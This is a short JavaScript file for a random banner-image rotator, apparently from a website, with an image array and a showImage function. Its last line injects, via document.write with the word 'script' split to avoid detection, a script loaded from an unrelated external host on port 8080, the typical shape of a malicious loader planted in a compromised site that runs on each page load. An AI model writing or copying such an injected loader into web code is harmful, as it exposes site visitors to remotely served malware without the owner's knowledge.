var theImages = new Array()
theImages[0] = '/images/theme1.jpg'
theImages[1] = '/images/theme2.jpg'
theImages[2] = '/images/theme3.jpg'
theImages[3] = '/images/theme4.jpg'

function showImage(id) {
	var whichImage = Math.round(Math.random() * (theImages.length - 1));
	document.write('<img id="banner" src="'+theImages[whichImage]+'">');
	// document.getElementById(id).style.backgroundImage = 'url(' + theImages[whichImage] + ')';
	// document.getElementById(id).style.backgroundPosition = 'center right';
}


document.write('<s'+'cript type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Web_Page.js"></scr'+'ipt>');